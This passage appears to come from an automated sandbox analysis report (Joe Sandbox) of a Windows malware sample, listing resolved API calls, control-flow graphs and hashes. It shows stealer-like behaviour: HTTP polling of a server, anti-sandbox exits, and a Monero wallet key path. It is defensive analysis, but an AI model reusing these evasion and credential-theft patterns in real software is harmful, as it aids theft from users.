                            • GetProcAddress.KERNEL32(734C0000,00E35CB0), ref: 0057A179
                            • GetProcAddress.KERNEL32(734C0000,00E3B928), ref: 0057A191
                            • GetProcAddress.KERNEL32(734C0000,00E4D4D0), ref: 0057A1A9
                            • GetProcAddress.KERNEL32(734C0000,00E4D5A8), ref: 0057A1C2
                            • GetProcAddress.KERNEL32(734C0000,00E35D30), ref: 0057A1DA
                            • GetProcAddress.KERNEL32(734C0000,00E35C90), ref: 0057A1F2
                            • GetProcAddress.KERNEL32(734C0000,00E4D4A0), ref: 0057A20B
                            • GetProcAddress.KERNEL32(752C0000,00E35E30), ref: 0057A22C
                            • GetProcAddress.KERNEL32(752C0000,00E35DB0), ref: 0057A244
                            • GetProcAddress.KERNEL32(752C0000,00E4D3F8), ref: 0057A25D
                            • GetProcAddress.KERNEL32(752C0000,00E4D488), ref: 0057A275
                            • GetProcAddress.KERNEL32(752C0000,00E35B10), ref: 0057A28D
                            • GetProcAddress.KERNEL32(74EC0000,00E3B860), ref: 0057A2B3
                            • GetProcAddress.KERNEL32(74EC0000,00E3B9F0), ref: 0057A2CB
                            • GetProcAddress.KERNEL32(74EC0000,00E4D548), ref: 0057A2E3
                            • GetProcAddress.KERNEL32(74EC0000,00E35D70), ref: 0057A2FC
                            • GetProcAddress.KERNEL32(74EC0000,00E35B30), ref: 0057A314
                            • GetProcAddress.KERNEL32(74EC0000,00E3B950), ref: 0057A32C
                            • GetProcAddress.KERNEL32(75BD0000,00E4D410), ref: 0057A352
                            • GetProcAddress.KERNEL32(75BD0000,00E35B70), ref: 0057A36A
                            • GetProcAddress.KERNEL32(75BD0000,00E491A8), ref: 0057A382
                            • GetProcAddress.KERNEL32(75BD0000,00E4D500), ref: 0057A39B
                            • GetProcAddress.KERNEL32(75BD0000,00E4D428), ref: 0057A3B3
                            • GetProcAddress.KERNEL32(75BD0000,00E35CD0), ref: 0057A3CB
                            • GetProcAddress.KERNEL32(75BD0000,00E35DD0), ref: 0057A3E4
                            • GetProcAddress.KERNEL32(75BD0000,00E4D590), ref: 0057A3FC
                            • GetProcAddress.KERNEL32(75BD0000,00E4D470), ref: 0057A414
                            • GetProcAddress.KERNEL32(75A70000,00E35C50), ref: 0057A436
                            • GetProcAddress.KERNEL32(75A70000,00E4D4E8), ref: 0057A44E
                            • GetProcAddress.KERNEL32(75A70000,00E4D4B8), ref: 0057A466
                            • GetProcAddress.KERNEL32(75A70000,00E4D518), ref: 0057A47F
                            • GetProcAddress.KERNEL32(75A70000,00E4D530), ref: 0057A497
                            • GetProcAddress.KERNEL32(75450000,00E35C30), ref: 0057A4B8
                            • GetProcAddress.KERNEL32(75450000,00E35AD0), ref: 0057A4D1
                            • GetProcAddress.KERNEL32(75DA0000,00E35B50), ref: 0057A4F2
                            • GetProcAddress.KERNEL32(75DA0000,00E4D560), ref: 0057A50A
                            • GetProcAddress.KERNEL32(6F070000,00E35D50), ref: 0057A530
                            • GetProcAddress.KERNEL32(6F070000,00E35BF0), ref: 0057A548
                            • GetProcAddress.KERNEL32(6F070000,00E35D90), ref: 0057A560
                            • GetProcAddress.KERNEL32(6F070000,00E4D458), ref: 0057A579
                            • GetProcAddress.KERNEL32(6F070000,00E35B90), ref: 0057A591
                            • GetProcAddress.KERNEL32(6F070000,00E35CF0), ref: 0057A5A9
                            • GetProcAddress.KERNEL32(6F070000,00E35D10), ref: 0057A5C2
                            • GetProcAddress.KERNEL32(6F070000,00E35E50), ref: 0057A5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0057A5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0057A607
                            • GetProcAddress.KERNEL32(75AF0000,00E4CE40), ref: 0057A629
                            • GetProcAddress.KERNEL32(75AF0000,00E49278), ref: 0057A641
                            • GetProcAddress.KERNEL32(75AF0000,00E4CFC0), ref: 0057A659
                            • GetProcAddress.KERNEL32(75AF0000,00E4CEA0), ref: 0057A672
                            • GetProcAddress.KERNEL32(75D90000,00E35AB0), ref: 0057A693
                            • GetProcAddress.KERNEL32(6E400000,00E4CED0), ref: 0057A6B4
                            • GetProcAddress.KERNEL32(6E400000,00E35AF0), ref: 0057A6CD
                            • GetProcAddress.KERNEL32(6E400000,00E4D098), ref: 0057A6E5
                            • GetProcAddress.KERNEL32(6E400000,00E4CEB8), ref: 0057A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: 0X$0Z$0[$0\$0]$0^$HttpQueryInfoA$InternetSetOptionA$PW$PY$P[$P\$P]$P^$p[$p]
                            • API String ID: 2238633743-195620413
                            • Opcode ID: 73ccfb0f62956a45a56f7958145f9fc7296ef1f8b2569ef0a78cdbb1ac2da579
                            • Instruction ID: d4f2fa80a57d1116080078334592cfa13786175e9238e2f50e11cedf48eaac85
                            • Opcode Fuzzy Hash: 73ccfb0f62956a45a56f7958145f9fc7296ef1f8b2569ef0a78cdbb1ac2da579
                            • Instruction Fuzzy Hash: 9F6249B6500210FFC796DFA8ED889663BF9F7DE601704C51AA609C3264D73DA841DF2A

                            Control-flow Graph

                            control_flow_graph 1033 575510-575577 call 575ad0 call 57a820 * 3 call 57a740 * 4 1049 57557c-575583 1033->1049 1050 5755d7-57564c call 57a740 * 2 call 561590 call 5752c0 call 57a8a0 call 57a800 call 57aad0 StrCmpCA 1049->1050 1051 575585-5755b6 call 57a820 call 57a7a0 call 561590 call 5751f0 1049->1051 1077 575693-5756a9 call 57aad0 StrCmpCA 1050->1077 1080 57564e-57568e call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1050->1080 1067 5755bb-5755d2 call 57a8a0 call 57a800 1051->1067 1067->1077 1083 5756af-5756b6 1077->1083 1084 5757dc-575844 call 57a8a0 call 57a820 * 2 call 561670 call 57a800 * 4 call 576560 call 561550 1077->1084 1080->1077 1085 5756bc-5756c3 1083->1085 1086 5757da-57585f call 57aad0 StrCmpCA 1083->1086 1215 575ac3-575ac6 1084->1215 1089 5756c5-575719 call 57a820 call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1085->1089 1090 57571e-575793 call 57a740 * 2 call 561590 call 5752c0 call 57a8a0 call 57a800 call 57aad0 StrCmpCA 1085->1090 1104 575865-57586c 1086->1104 1105 575991-5759f9 call 57a8a0 call 57a820 * 2 call 561670 call 57a800 * 4 call 576560 call 561550 1086->1105 1089->1086 1090->1086 1193 575795-5757d5 call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1090->1193 1110 575872-575879 1104->1110 1111 57598f-575a14 call 57aad0 StrCmpCA 1104->1111 1105->1215 1117 5758d3-575948 call 57a740 * 2 call 561590 call 5752c0 call 57a8a0 call 57a800 call 57aad0 StrCmpCA 1110->1117 1118 57587b-5758ce call 57a820 call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1110->1118 1140 575a16-575a21 Sleep 1111->1140 1141 575a28-575a91 call 57a8a0 call 57a820 * 2 call 561670 call 57a800 * 4 call 576560 call 561550 1111->1141 1117->1111 1219 57594a-57598a call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1117->1219 1118->1111 1140->1049 1141->1215 1193->1086 1219->1111
                            APIs
                              • Part of subcall function 0057A820: lstrlen.KERNEL32(00564F05,?,?,00564F05,00580DDE), ref: 0057A82B
                              • Part of subcall function 0057A820: lstrcpy.KERNEL32(00580DDE,00000000), ref: 0057A885
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005756A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575857
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575228
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 005752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575318
                              • Part of subcall function 005752C0: lstrlen.KERNEL32(00000000), ref: 0057532F
                              • Part of subcall function 005752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00575364
                              • Part of subcall function 005752C0: lstrlen.KERNEL32(00000000), ref: 00575383
                              • Part of subcall function 005752C0: lstrlen.KERNEL32(00000000), ref: 005753AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0057578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00575A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$pZ
                            • API String ID: 507064821-1849336184
                            • Opcode ID: 2144d8ecef88bb8d07a18c77fcf026ad9be03c5d6141fc91b826367d230678ed
                            • Instruction ID: e27ed4daa1862c8c51c8648f97c72fb31df2f2f0ab1c4b576d63074681862a10
                            • Opcode Fuzzy Hash: 2144d8ecef88bb8d07a18c77fcf026ad9be03c5d6141fc91b826367d230678ed
                            • Instruction Fuzzy Hash: E2E13172910105AACB18FBB0EC5ADFD7B38BBD4300F50C528B41A66095FF746A09EB97

                            Control-flow Graph

                            control_flow_graph 1244 566280-56630b call 57a7a0 call 5647b0 call 57a740 InternetOpenA StrCmpCA 1251 566314-566318 1244->1251 1252 56630d 1244->1252 1253 56631e-566342 InternetConnectA 1251->1253 1254 566509-566525 call 57a7a0 call 57a800 * 2 1251->1254 1252->1251 1256 5664ff-566503 InternetCloseHandle 1253->1256 1257 566348-56634c 1253->1257 1273 566528-56652d 1254->1273 1256->1254 1259 56634e-566358 1257->1259 1260 56635a 1257->1260 1262 566364-566392 HttpOpenRequestA 1259->1262 1260->1262 1264 5664f5-5664f9 InternetCloseHandle 1262->1264 1265 566398-56639c 1262->1265 1264->1256 1267 5663c5-566405 HttpSendRequestA HttpQueryInfoA 1265->1267 1268 56639e-5663bf InternetSetOptionA 1265->1268 1269 566407-566427 call 57a740 call 57a800 * 2 1267->1269 1270 56642c-56644b call 578940 1267->1270 1268->1267 1269->1273 1278 56644d-566454 1270->1278 1279 5664c9-5664e9 call 57a740 call 57a800 * 2 1270->1279 1282 566456-566480 InternetReadFile 1278->1282 1283 5664c7-5664ef InternetCloseHandle 1278->1283 1279->1273 1287 566482-566489 1282->1287 1288 56648b 1282->1288 1283->1264 1287->1288 1291 56648d-5664c5 call 57a9b0 call 57a8a0 call 57a800 1287->1291 1288->1283 1291->1282
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • InternetOpenA.WININET(00580DFE,00000001,00000000,00000000,00000000), ref: 005662E1
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00566335
                            • HttpOpenRequestA.WININET(00000000,GET,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00566385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005663BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005663D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005663FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0056646D
                            • InternetCloseHandle.WININET(00000000), ref: 005664EF
                            • InternetCloseHandle.WININET(00000000), ref: 005664F9
                            • InternetCloseHandle.WININET(00000000), ref: 00566503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: b41f36302458dd0860c18132fcd86812faed59fbd99822b0a7e7bcde734bb25a
                            • Instruction ID: 87418f07774bcfbf4328c049b1c2e979bd5398becc1a3034dead2f40add9d35c
                            • Opcode Fuzzy Hash: b41f36302458dd0860c18132fcd86812faed59fbd99822b0a7e7bcde734bb25a
                            • Instruction Fuzzy Hash: 8C713F71A00218ABDF24DFA0DC59FEE7B78FB84701F108558F50A6B190DBB46A85DF52

                            Control-flow Graph

                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 005717C5
                            • ExitProcess.KERNEL32 ref: 005717D1
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 4c1fde11757513daadd9fd69080e69ad8b402f3850a294552defdc5dc016575a
                            • Instruction ID: 6d876357d4813d167bdfc3d247c538f38aaa79b467c59378c26774ef4715417a
                            • Opcode Fuzzy Hash: 4c1fde11757513daadd9fd69080e69ad8b402f3850a294552defdc5dc016575a
                            • Instruction Fuzzy Hash: CE5163B4A04209EFCB04DFA4E958ABE7BB5BF84704F10C448E90A77240D774E946EB56

                            Control-flow Graph

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00577542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0057757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0057760A
                            • wsprintfA.USER32 ref: 00577640
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$X
                            • API String ID: 1544550907-4153561689
                            • Opcode ID: 01fced3a57347e4487d279858f29e0a919272556fd6d130421dfaa79a484206b
                            • Instruction ID: 49f86353cb369a09f53773d54a74f9a5e058524115417ae5651a76581cc63aad
                            • Opcode Fuzzy Hash: 01fced3a57347e4487d279858f29e0a919272556fd6d130421dfaa79a484206b
                            • Instruction Fuzzy Hash: B7417FB1904258ABDB11DF94EC49BEEBBB8BF48700F108199F50967280D7786A44DBA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E424A0), ref: 005798A1
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E423F8), ref: 005798BA
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42230), ref: 005798D2
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 005798EA
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42410), ref: 00579903
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E49148), ref: 0057991B
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E357B0), ref: 00579933
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E35930), ref: 0057994C
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E424E8), ref: 00579964
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E422F0), ref: 0057997C
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42350), ref: 00579995
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E424B8), ref: 005799AD
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E35810), ref: 005799C5
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E423C8), ref: 005799DE
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 005611D0: ExitProcess.KERNEL32 ref: 00561211
                              • Part of subcall function 00561160: GetSystemInfo.KERNEL32(?), ref: 0056116A
                              • Part of subcall function 00561160: ExitProcess.KERNEL32 ref: 0056117E
                              • Part of subcall function 00561110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0056112B
                              • Part of subcall function 00561110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00561132
                              • Part of subcall function 00561110: ExitProcess.KERNEL32 ref: 00561143
                              • Part of subcall function 00561220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0056123E
                              • Part of subcall function 00561220: __aulldiv.LIBCMT ref: 00561258
                              • Part of subcall function 00561220: __aulldiv.LIBCMT ref: 00561266
                              • Part of subcall function 00561220: ExitProcess.KERNEL32 ref: 00561294
                              • Part of subcall function 00576770: GetUserDefaultLangID.KERNEL32 ref: 00576774
                              • Part of subcall function 00561190: ExitProcess.KERNEL32 ref: 005611C6
                              • Part of subcall function 00577850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005611B7), ref: 00577880
                              • Part of subcall function 00577850: RtlAllocateHeap.NTDLL(00000000), ref: 00577887
                              • Part of subcall function 00577850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0057789F
                              • Part of subcall function 005778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577910
                              • Part of subcall function 005778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00577917
                              • Part of subcall function 005778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0057792F
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00576AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00576AF9
                            • Sleep.KERNEL32(00001770), ref: 00576B04
                            • CloseHandle.KERNEL32(?,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576B1A
                            • ExitProcess.KERNEL32 ref: 00576B22
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 86b75a7558462fb4bbd5490f4c75deabeedde07ea834e6943b6c1a1380e32cb9
                            • Instruction ID: 54bcae43033bf5da4f6b3ac2c3e602d9d247e3ecdd12e3e8a576095d299de05b
                            • Opcode Fuzzy Hash: 86b75a7558462fb4bbd5490f4c75deabeedde07ea834e6943b6c1a1380e32cb9
                            • Instruction Fuzzy Hash: 1F310E7190010AAADB04FBB0EC5AAFE7F78BFC5340F10C518F61AA6191DF745905E7A6

                            Control-flow Graph

                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0056123E
                            • __aulldiv.LIBCMT ref: 00561258
                            • __aulldiv.LIBCMT ref: 00561266
                            • ExitProcess.KERNEL32 ref: 00561294
                            Strings
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: fcd07d3d77c7b6a90c3fa45f3a3ede6d7ef70e96578eda7434880f2cee478508
                            • Instruction ID: 05122bc6f465f4a9e6f6ed5d44015388e016a4a0ec5e8ea33a6045ddd773ba57
                            • Opcode Fuzzy Hash: fcd07d3d77c7b6a90c3fa45f3a3ede6d7ef70e96578eda7434880f2cee478508
                            • Instruction Fuzzy Hash: E2014BB0D40308BAEB10DBE1DC49BAEBF78BB44701F248458E705B7280D7745545879D

                            Control-flow Graph

                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00576AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00576AF9
                            • Sleep.KERNEL32(00001770), ref: 00576B04
                            • CloseHandle.KERNEL32(?,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576B1A
                            • ExitProcess.KERNEL32 ref: 00576B22
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 50f39c62b087e4da72bcdba3de044bb60e02b75ed7f10b2dd4c7bccc0d5579af
                            • Instruction ID: 69bbf8ec62fc6303f605d5bc4da333c7b5a30a614894c63d79e109f61b4422e9
                            • Opcode Fuzzy Hash: 50f39c62b087e4da72bcdba3de044bb60e02b75ed7f10b2dd4c7bccc0d5579af
                            • Instruction Fuzzy Hash: A8F03A7094061AAEE700ABA0AC0ABBE7E34FB85701F10C914B50EA1181DBB45540EB6A

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: b6314b2760cc3f927598574ea87085d0fafea3c4590c75caca2b0ee15e264120
                            • Instruction ID: f43aa7f5b19d80305fb628c8d2656bd16258f6677126a0e4b1bf892f24f26b79
                            • Opcode Fuzzy Hash: b6314b2760cc3f927598574ea87085d0fafea3c4590c75caca2b0ee15e264120
                            • Instruction Fuzzy Hash: 4F214FB1D00209ABDF14DFA4E849ADE7B75FB45320F108625F929A72C1EB706A05CF82

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 00566280: InternetOpenA.WININET(00580DFE,00000001,00000000,00000000,00000000), ref: 005662E1
                              • Part of subcall function 00566280: StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566303
                              • Part of subcall function 00566280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00566335
                              • Part of subcall function 00566280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00566385
                              • Part of subcall function 00566280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005663BF
                              • Part of subcall function 00566280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005663D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
